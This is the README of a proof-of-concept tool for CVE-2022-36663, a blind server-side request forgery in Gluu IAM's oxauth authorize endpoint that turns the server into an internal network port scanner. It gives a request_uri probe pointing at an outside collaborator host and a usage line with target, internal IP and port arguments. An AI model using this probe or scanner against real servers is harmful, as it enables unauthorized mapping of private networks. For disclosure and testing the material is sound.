# CVE-2022-36663-PoC
Internal network scanner through Gluu IAM blind ssrf

Gluu IAM is vulnerable to blind SSRF which can be exploited to scan the internal network for open ports depending on response times.

To check if the target is vulnerable, add `&request_uri=http://burpcollab` to the `/oxauth/restv1/authorize` request and poll for incoming traffic from the target server.
# Usage

```python3 --url https://target --ip --port 8080 --ar '/oxauth/restv1/authorize?client_id=<clientID>&redirect_uri=<nonce>&acr_values=simple_password_auth&request_uri='```

Url - the Gluu IAM server url

IP - The internal Ip address or subnet that you want to scan

Port - The internal port you want to scan

AR - The authorization request URL ending with an empty request_uri